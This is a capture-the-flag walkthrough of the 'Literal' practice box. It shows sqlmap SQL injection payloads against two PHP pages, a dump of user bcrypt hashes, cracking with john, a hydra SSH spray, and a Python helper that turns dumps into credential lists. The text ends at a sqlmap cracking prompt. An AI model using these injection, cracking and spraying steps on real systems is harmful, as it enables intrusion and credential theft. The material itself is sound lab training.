Literal


Information gathering

Port scanning

┌──(kali㉿kali)-[~/temp/literal]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.10.107:22
Open 192.168.10.107:80

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 30:ca:55:94:68:33:8b:50:42:f4:c2:b5:13:99:66:fe (RSA)
| ssh-rsa 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
|   256 2d:b0:5e:6b:96:bd:0b:e3:14:fb:e0:d0:58:84:50:85 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNvQ4n2nkgCsY7Z8qPbOt54NyXbow2ioVHPFXTn6XuwDOJpc5Q0FhEmSTVC4o4l9G+FMDzkJ2JgghkHvNstXiXU=
|   256 92:d9:2a:5d:6f:58:db:85:56:d6:0c:99:68:b8:59:64 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKUnTxK9t2cdkLjqE75NTSfr7qidWHqt0/uV3i0UALED
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://blog.literal.hmv
MAC Address: 08:00:27:4C:64:E1 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: blog.literal.hmv; OS: Linux; CPE: cpe:/o:linux:linux_kernel

The http-title line shows a redirect to blog.literal.hmv, so the site is served by name; add the host to /etc/hosts:

192.168.10.107   blog.literal.hmv

Directory scanning

┌──(kali㉿kali)-[~/temp/literal]
└─$ gobuster dir -u http://blog.literal.hmv/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,zip -e 200,302,301 -t 20      
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://blog.literal.hmv/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,zip,php
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://blog.literal.hmv/.html                (Status: 403) [Size: 281]
http://blog.literal.hmv/.php                 (Status: 403) [Size: 281]
http://blog.literal.hmv/images               (Status: 301) [Size: 321] [--> http://blog.literal.hmv/images/]
http://blog.literal.hmv/index.html           (Status: 200) [Size: 3325]
http://blog.literal.hmv/login.php            (Status: 200) [Size: 1893]
http://blog.literal.hmv/register.php         (Status: 200) [Size: 2159]
http://blog.literal.hmv/logout.php           (Status: 302) [Size: 0] [--> login.php]
http://blog.literal.hmv/config.php           (Status: 200) [Size: 0]
http://blog.literal.hmv/fonts                (Status: 301) [Size: 320] [--> http://blog.literal.hmv/fonts/]
http://blog.literal.hmv/dashboard.php        (Status: 302) [Size: 0] [--> login.php]
http://blog.literal.hmv/.html                (Status: 403) [Size: 281]
http://blog.literal.hmv/.php                 (Status: 403) [Size: 281]
http://blog.literal.hmv/server-status        (Status: 403) [Size: 281]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

Vulnerability discovery

Footprinting

login.php and register.php are a standard login/registration pair. Register a throwaway account (kali) and log in. Once authenticated, next_projects_to_do.php accepts a search term through the POST parameter sentence-query and is plainly backed by a database.

SQL injection

Test that parameter for SQL injection. For whatever reason the site is extremely slow and laggy in the browser, so work from the command line instead, reusing the authenticated session cookie from the browser:

PHPSESSID=1q4tie68cpa1mue9af2ao65549

Run sqlmap against it. The output below is a resumed run, so the detection phase is not shown; sqlmap had already found both a time-based blind injection and a 5-column UNION injection in sentence-query, and the UNION technique is what makes the dump fast:

┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://blog.literal.hmv/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.2#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:04:49 /2025-06-08/

[12:04:49] [INFO] resuming back-end DBMS 'mysql' 
[12:04:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: sentence-query (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sentence-query=1' AND (SELECT 3428 FROM (SELECT(SLEEP(5)))hFKD) AND 'mdnY'='mdnY

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: sentence-query=1' UNION ALL SELECT NULL,CONCAT(0x717a6b7871,0x4b756f5a616d456b4c76596f48446652644149766b6d64745666776148746858744863505247566e,0x716b626a71),NULL,NULL,NULL-- -
---
[12:04:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[12:04:49] [INFO] fetching database names
available databases [4]:
[*] blog
[*] information_schema
[*] mysql
[*] performance_schema

[12:04:50] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/blog.literal.hmv'

┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://blog.literal.hmv/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch -D blog --tables
-----
Database: blog
[2 tables]
+----------+
| projects |
| users    |
+----------+

┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://blog.literal.hmv/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch -D blog -T users --dump

Database: blog
Table: users
[18 entries]
+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+
| userid | username  | useremail                        | userpassword                                                 | usercreatedate      |
+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+
| 1      | test      | test@blog.literal.htb            | $2y$10$wWhvCz1pGsKm..jh/lChIOA7aJoZRAil40YKlGFiw6B.6a77WzNma | 2023-04-07 17:21:47 |
| 2      | admin     | admin@blog.literal.htb           | $2y$10$fjNev2yv9Bi1IQWA6VOf9Owled5hExgUZNoj8gSmc7IdZjzuOWQ8K | 2023-04-07 17:21:47 |
| 3      | carlos    | carlos@blog.literal.htb          | $2y$10$ikI1dN/A1lhkKLmiKl.cJOkLiSgPUPiaRoopeqvD/.p.bh0w.bJBW | 2023-04-07 17:21:48 |
| 4      | freddy123 | freddy123@zeeli.moc              | $2y$10$yaf9nZ6UJkf8103R8rMdtOUC.vyZUek4vXVPas3CPOb4EK8I6eAUK | 2023-04-07 17:21:48 |
| 5      | jorg3_M   | jorg3_M@zeeli.moc                | $2y$10$lZ./Zflz1EEFdYbWp7VUK.415Ni8q9kYk3LJ2nF0soRJG1RymtDzG | 2023-04-07 17:21:48 |
| 6      | aNdr3s1to | aNdr3s1to@puertonacional.ply     | $2y$10$F2Eh43xkXR/b0KaGFY5MsOwlnh4fuEZX3WNhT3PxSw.6bi/OBA6hm | 2023-04-07 17:21:48 |
| 7      | kitty     | kitty@estadodelarte.moc          | $2y$10$rXliRlBckobgE8mJTZ7oXOaZr4S2NSwqinbUGLcOfCWDra6v9bxcW | 2023-04-07 17:21:48 |
| 8      | walter    | walter@forumtesting.literal.hmv  | $2y$10$er9GaSRv1AwIwu9O.tlnnePNXnzDfP7LQMAUjW2Ca1td3p0Eve6TO | 2023-04-07 17:21:48 |
| 9      | estefy    | estefy@caselogic.moc             | $2y$10$hBB7HeTJYBAtdFn7Q4xzL.WT3EBMMZcuTJEAvUZrRe.9szCp19ZSa | 2023-04-07 17:21:48 |
| 10     | michael   | michael@without.you              | $2y$10$sCbKEWGgAUY6a2Y.DJp8qOIa250r4ia55RMrDqHoRYU3Y7pL2l8Km | 2023-04-07 17:21:48 |
| 11     | r1ch4rd   | r1ch4rd@forumtesting.literal.hmv | $2y$10$7itXOzOkjrAKk7Mp.5VN5.acKwGi1ziiGv8gzQEK7FOFLomxV0pkO | 2023-04-07 17:21:48 |
| 12     | fel1x     | fel1x@without.you                | $2y$10$o06afYsuN8yk0yoA.SwMzucLEavlbI8Rl43.S0tbxL.VVSbsCEI0m | 2023-04-07 17:21:48 |
| 13     | kelsey    | kelsey@without.you               | $2y$10$vxN98QmK39rwvVbfubgCWO9W2alVPH4Dp4Bk7DDMWRvfN995V4V6. | 2023-04-07 17:21:48 |
| 14     | jtx       | jtx@tiempoaltiempo.hy            | $2y$10$jN5dt8syJ5cVrlpotOXibeNC/jvW0bn3z6FetbVU/CeFtKwhdhslC | 2023-04-07 17:21:48 |
| 15     | DRphil    | DRphil@alcaldia-tol.gob          | $2y$10$rW58MSsVEaRqr8uIbUeEeuDrYB6nmg7fqGz90rHYHYMt2Qyflm1OC | 2023-04-07 17:21:48 |
| 16     | carm3N    | carm3N@estadodelarte.moc         | $2y$10$D7uF6dKbRfv8U/M/mUj0KujeFxtbj6mHCWT5SaMcug45u7lo/.RnW | 2023-04-07 17:21:48 |
| 17     | lanz      | lanz@literal.htb                 | $2y$10$PLGN5.jq70u3j5fKpR8R6.Zb70So/8IWLi4e69QqJrM8FZvAMf..e | 2023-04-07 17:55:36 |
| 18     | kali      | kali@kali.com                    | $2y$10$zzhgE4mDcdEGhDR6VGwK9.qpCDLnDkFmVB6cSDo.bPNjKdUV.Hw1. | 2025-06-08 15:40:11 |
+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+

Now to crack them. I simply pasted the table into an AI and had it return user:hash pairs (the finest chefs use the plainest cooking methods):

test:$2y$10$wWhvCz1pGsKm..jh/lChIOA7aJoZRAil40YKlGFiw6B.6a77WzNma
admin:$2y$10$fjNev2yv9Bi1IQWA6VOf9Owled5hExgUZNoj8gSmc7IdZjzuOWQ8K
carlos:$2y$10$ikI1dN/A1lhkKLmiKl.cJOkLiSgPUPiaRoopeqvD/.p.bh0w.bJBW
freddy123:$2y$10$yaf9nZ6UJkf8103R8rMdtOUC.vyZUek4vXVPas3CPOb4EK8I6eAUK
jorg3_M:$2y$10$lZ./Zflz1EEFdYbWp7VUK.415Ni8q9kYk3LJ2nF0soRJG1RymtDzG
aNdr3s1to:$2y$10$F2Eh43xkXR/b0KaGFY5MsOwlnh4fuEZX3WNhT3PxSw.6bi/OBA6hm
kitty:$2y$10$rXliRlBckobgE8mJTZ7oXOaZr4S2NSwqinbUGLcOfCWDra6v9bxcW
walter:$2y$10$er9GaSRv1AwIwu9O.tlnnePNXnzDfP7LQMAUjW2Ca1td3p0Eve6TO
estefy:$2y$10$hBB7HeTJYBAtdFn7Q4xzL.WT3EBMMZcuTJEAvUZrRe.9szCp19ZSa
michael:$2y$10$sCbKEWGgAUY6a2Y.DJp8qOIa250r4ia55RMrDqHoRYU3Y7pL2l8Km
r1ch4rd:$2y$10$7itXOzOkjrAKk7Mp.5VN5.acKwGi1ziiGv8gzQEK7FOFLomxV0pkO
fel1x:$2y$10$o06afYsuN8yk0yoA.SwMzucLEavlbI8Rl43.S0tbxL.VVSbsCEI0m
kelsey:$2y$10$vxN98QmK39rwvVbfubgCWO9W2alVPH4Dp4Bk7DDMWRvfN995V4V6.
jtx:$2y$10$jN5dt8syJ5cVrlpotOXibeNC/jvW0bn3z6FetbVU/CeFtKwhdhslC
DRphil:$2y$10$rW58MSsVEaRqr8uIbUeEeuDrYB6nmg7fqGz90rHYHYMt2Qyflm1OC
carm3N:$2y$10$D7uF6dKbRfv8U/M/mUj0KujeFxtbj6mHCWT5SaMcug45u7lo/.RnW
lanz:$2y$10$PLGN5.jq70u3j5fKpR8R6.Zb70So/8IWLi4e69QqJrM8FZvAMf..e
kali:$2y$10$zzhgE4mDcdEGhDR6VGwK9.qpCDLnDkFmVB6cSDo.bPNjKdUV.Hw1.

Crack them with john against rockyou (bcrypt at cost 10, so this takes a while; 11 of the 18 fall):

┌──(kali㉿kali)-[~/temp/literal]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 18 password hashes with 18 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456789        (freddy123)     
butterfly        (estefy)     
monica           (r1ch4rd)     
hellokitty       (kitty)     
50cent           (DRphil)     
slipknot         (jorg3_M)     
michael1         (michael)     
147258369        (fel1x)     
kelsey           (kelsey)     
741852963        (walter)
zxcvbnm,./       (jtx)  

Record the recovered passwords and try them over SSH. I had an AI write a script to match them up; the result is a user list and a password list in the same order:

# user
freddy123
estefy
r1ch4rd
kitty
DRphil
jorg3_M
michael
fel1x
kelsey
walter
jtx

# pass
123456789
butterfly
monica
hellokitty
50cent
slipknot
michael1
147258369
kelsey
741852963
zxcvbnm,./
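
Splitting the dump and pairing cracked passwords back to their users can both be done deterministically instead of by hand. The script below is an added example, not part of the original write-up: it parses the sqlmap table as printed into john's user:hash format, and reads john's own "password (user)" lines back into login:password pairs for hydra -C, so the pairing cannot drift the way two separately edited lists joined with paste can. Both sample inputs are constructed excerpts of the output above.

```python
import re

# Constructed excerpt of the sqlmap table printed above (two of the 18 rows).
SAMPLE_DUMP = """\
+--------+----------+-------------------------+--------------------------------------------------------------+---------------------+
| userid | username | useremail               | userpassword                                                 | usercreatedate      |
+--------+----------+-------------------------+--------------------------------------------------------------+---------------------+
| 1      | test     | test@blog.literal.htb   | $2y$10$wWhvCz1pGsKm..jh/lChIOA7aJoZRAil40YKlGFiw6B.6a77WzNma | 2023-04-07 17:21:47 |
| 3      | carlos   | carlos@blog.literal.htb | $2y$10$ikI1dN/A1lhkKLmiKl.cJOkLiSgPUPiaRoopeqvD/.p.bh0w.bJBW | 2023-04-07 17:21:48 |
+--------+----------+-------------------------+--------------------------------------------------------------+---------------------+
"""

# Constructed excerpt of john's cracking output: "<password>   (<user>)" lines
# plus one of the status lines that must not be mistaken for a result.
SAMPLE_JOHN = """\
Loaded 18 password hashes with 18 different salts (bcrypt [Blowfish 32/64 X3])
123456789        (freddy123)
butterfly        (estefy)
zxcvbnm,./       (jtx)
"""


def parse_sqlmap_table(text):
    """Turn sqlmap's ASCII table into a list of dicts keyed by column header.
    Border lines start with '+', header and data lines with '|'; bcrypt hashes
    and e-mail addresses never contain '|', so a plain split is safe."""
    header, rows = None, []
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if header is None:
            header = cells
        else:
            rows.append(dict(zip(header, cells)))
    return rows


def dump_to_john(text, user_col="username", hash_col="userpassword"):
    """user:hash lines; john treats the text before ':' as the login name."""
    return [f"{row[user_col]}:{row[hash_col]}" for row in parse_sqlmap_table(text)]


# User names contain neither spaces nor parentheses, which keeps status lines
# such as "Loaded 18 password hashes ... (bcrypt [Blowfish 32/64 X3])" out.
JOHN_LINE = re.compile(r"^(?P<password>.*?)\s+\((?P<user>[^()\s]+)\)\s*$")


def john_to_creds(text):
    """(user, password) pairs read straight from john's output."""
    pairs = []
    for line in text.splitlines():
        m = JOHN_LINE.match(line)
        if m:
            pairs.append((m.group("user"), m.group("password")))
    return pairs


def creds_to_hydra(pairs):
    """hydra -C expects one login:password per line."""
    return [f"{user}:{password}" for user, password in pairs]


if __name__ == "__main__":
    print("\n".join(dump_to_john(SAMPLE_DUMP)))      # feed this to john
    print("\n".join(creds_to_hydra(john_to_creds(SAMPLE_JOHN))))  # feed this to hydra -C
```

On a real run, `john --show hash` already prints user:password pairs and is the cleaner source; the regex above exists for when only the live cracking output was saved. hydra's -C format uses ':' as the separator, so a password containing a colon would need hydra's -l/-p form instead.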

Spray the pairs against SSH with hydra; none of them work, so the web passwords were not reused:

┌──(kali㉿kali)-[~/temp/literal]
└─$ paste -d: user pass > cred

┌──(kali㉿kali)-[~/temp/literal]
└─$ hydra -C cred ssh://192.168.10.107:22 -t 4 -vV -f 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-08 12:42:58
[DATA] max 4 tasks per 1 server, overall 4 tasks, 11 login tries, ~3 tries per task
[DATA] attacking ssh://192.168.10.107:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://freddy123@192.168.10.107:22
[INFO] Successful, password authentication is supported by ssh://192.168.10.107:22
[ATTEMPT] target 192.168.10.107 - login "freddy123" - pass "123456789" - 1 of 11 [child 0] (0/0)
[ATTEMPT] target 192.168.10.107 - login "estefy" - pass "butterfly" - 2 of 11 [child 1] (0/0)
[ATTEMPT] target 192.168.10.107 - login "r1ch4rd" - pass "monica" - 3 of 11 [child 2] (0/0)
[ATTEMPT] target 192.168.10.107 - login "kitty" - pass "hellokitty" - 4 of 11 [child 3] (0/0)
[ATTEMPT] target 192.168.10.107 - login "DRphil" - pass "50cent" - 5 of 11 [child 0] (0/0)
[ATTEMPT] target 192.168.10.107 - login "jorg3_M" - pass "slipknot" - 6 of 11 [child 1] (0/0)
[ATTEMPT] target 192.168.10.107 - login "michael" - pass "michael1" - 7 of 11 [child 3] (0/0)
[ATTEMPT] target 192.168.10.107 - login "fel1x" - pass "147258369" - 8 of 11 [child 2] (0/0)
[ATTEMPT] target 192.168.10.107 - login "kelsey" - pass "kelsey" - 9 of 11 [child 3] (0/0)
[ATTEMPT] target 192.168.10.107 - login "walter" - pass "741852963" - 10 of 11 [child 1] (0/0)
[ATTEMPT] target 192.168.10.107 - login "jtx" - pass "zxcvbnm,./" - 11 of 11 [child 0] (0/0)
[STATUS] attack finished for 192.168.10.107 (waiting for children to complete tests)
1 of 1 target completed, 0 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-08 12:43:07

A new injection point

The e-mail addresses in the dump (walter@ and r1ch4rd@) reveal a second virtual host, forumtesting.literal.hmv. Add it to /etc/hosts:

192.168.10.107   forumtesting.literal.hmv

Visiting it redirects to:

http://forumtesting.literal.hmv/category.php

The site is too slow and keeps hanging in the browser, so test it from the terminal:

┌──(kali㉿kali)-[~/temp/literal]
└─$ curl http://forumtesting.literal.hmv/category.php
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap-theme.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<!-- jQuery -->
<title>c4TLoUis forum</title> 
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="css/style.css">
</head>
<body class="">
<div class="container" style="min-height:500px;">
        <div class="container">
        <div class="row">
                <h2>Discussion Forum | About... Imagination</h2>
                <h3><a href="category.php">Home</a> | <a href="login.php">Login</a> | <a href="cp_login.php">Control Panel</a></h3>


                                        <div class="single category">
                                <ul class="list-unstyled">
                                        <li><span style="font-size:25px;font-weight:bold;">Categories</span> <span class="pull-right"><span style="font-size:20px;font-weight:bold;">Topics / Posts</span></span></li>
                                                                                        <li><a href="category.php?category_id=2" title="">Forum details <span class="pull-right">0 / 0</span></a></li>
                                                                                        <li><a href="category.php?category_id=1" title="">New things for the blog <span class="pull-right">0 / 0</span></a></li>
                                                                        </ul>
                   </div>
                </div>
</div>
<div class="insert-post-ads1" style="margin-top:20px;">

</body>
</html>

┌──(kali㉿kali)-[~/temp/literal]
└─$ curl http://forumtesting.literal.hmv/category.php | html2text
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1816  100  1816    0     0  24319      0 --:--:-- --:--:-- --:--:-- 24540
***** Discussion Forum | About... Imagination *****
**** Home | Login | Control Panel ****
    * Categories Topics / Posts
    * Forum details 0 / 0
    * New things for the blog 0 / 0

┌──(kali㉿kali)-[~/temp/literal]
└─$ curl -s http://forumtesting.literal.hmv/category.php | html2text
***** Discussion Forum | About... Imagination *****
**** Home | Login | Control Panel ****
    * Categories Topics / Posts
    * Forum details 0 / 0
    * New things for the blog 0 / 0

The category links expose a likely injection point, category.php?category_id=2; test it with sqlmap:

┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://forumtesting.literal.hmv/category.php?category_id=2" --batch --dbs              
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.2#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:55:58 /2025-06-08/

[12:55:58] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=82oqekh0oed...3bdp26e439'). Do you want to use those [Y/n] Y
[12:55:58] [INFO] testing if the target URL content is stable
[12:55:58] [INFO] target URL content is stable
[12:55:58] [INFO] testing if GET parameter 'category_id' is dynamic
[12:55:58] [INFO] GET parameter 'category_id' appears to be dynamic
[12:55:58] [WARNING] heuristic (basic) test shows that GET parameter 'category_id' might not be injectable
[12:55:58] [INFO] testing for SQL injection on GET parameter 'category_id'
[12:55:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:55:59] [WARNING] reflective value(s) found and filtering out
[12:55:59] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:55:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:55:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:55:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:55:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:55:59] [INFO] testing 'Generic inline queries'
[12:55:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:55:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:55:59] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:55:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:56:19] [INFO] GET parameter 'category_id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:56:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:56:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:56:19] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:56:19] [INFO] target URL appears to have 1 column in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
[12:56:19] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') 
[12:56:19] [INFO] target URL appears to be UNION injectable with 1 columns
[12:56:19] [INFO] checking if the injection point on GET parameter 'category_id' is a false positive
GET parameter 'category_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:
---
Parameter: category_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category_id=2 AND (SELECT 9058 FROM (SELECT(SLEEP(5)))OMno)
---
[12:56:59] [INFO] the back-end DBMS is MySQL
[12:56:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41, PHP
back-end DBMS: MySQL >= 5.0.12
[12:57:00] [INFO] fetching database names
[12:57:00] [INFO] fetching number of databases
[12:57:00] [INFO] retrieved: 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[12:57:30] [INFO] adjusting time delay to 1 second due to good response times
3
[12:57:30] [INFO] retrieved: in^C
[12:57:45] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 72 times

This one is only a time-based blind injection (sqlmap's UNION probe was not confirmed, so every character has to be inferred from response delays). The box is clearly built for SQL injection practice; I'll come back and do it by hand some time. It is very slow, but after a long run it yields a credential:

# sqlmap -u "http://forumtesting.literal.hmv/category.php?category_id=2" --batch --dbs
# information_schema
# performance_schema
# forumtesting

# sqlmap -u "http://forumtesting.literal.hmv/category.php?category_id=2" --batch -D forumtesting --tables
# forum_category
# forum_owner
# forum_posts
# forum_topics
# forum_users

┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://forumtesting.literal.hmv/category.php?category_id=2" --batch -D forumtesting -T forum_owner --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.2#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:24:22 /2025-06-08/

[13:24:22] [INFO] resuming back-end DBMS 'mysql' 
[13:24:22] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=cldac0c27tr...9f43f8ihi7'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: category_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category_id=2 AND (SELECT 9058 FROM (SELECT(SLEEP(5)))OMno)
---
[13:24:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41, PHP
back-end DBMS: MySQL >= 5.0.12
[13:24:22] [INFO] fetching columns for table 'forum_owner' in database 'forumtesting'
[13:24:22] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                                              
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[13:24:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
5
[13:24:43] [INFO] retrieved: 
[13:24:53] [INFO] adjusting time delay to 1 second due to good response times
created
[13:25:27] [INFO] retrieved: email
[13:25:53] [INFO] retrieved: id
[13:26:06] [INFO] retrieved: password
[13:27:00] [INFO] retrieved: username
[13:27:45] [INFO] fetching entries for table 'forum_owner' in database 'forumtesting'
[13:27:45] [INFO] fetching number of entries for table 'forum_owner' in database 'forumtesting'
[13:27:45] [INFO] retrieved: 1
[13:27:47] [WARNING] reflective value(s) found and filtering out of statistical model, please wait                                                                                          
.............................. (done)
2022-02-12
[13:28:46] [INFO] retrieved: carlos@forumtesting.literal.htb
[13:32:11] [INFO] retrieved: 1
[13:32:16] [INFO] retrieved: 6705fe62010679f04257358241792b41acba4ea896178a40eb63c743f5317a09faefa2e056486d55e9c05f851b222e6e7c5c1bd22af135157aa9b02201cf4e99
[13:46:13] [INFO] retrieved: carlos
[13:46:49] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[13:46:49] [INFO] using hash method 'sha512_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[13:46:49] [INFO] using default dictionary
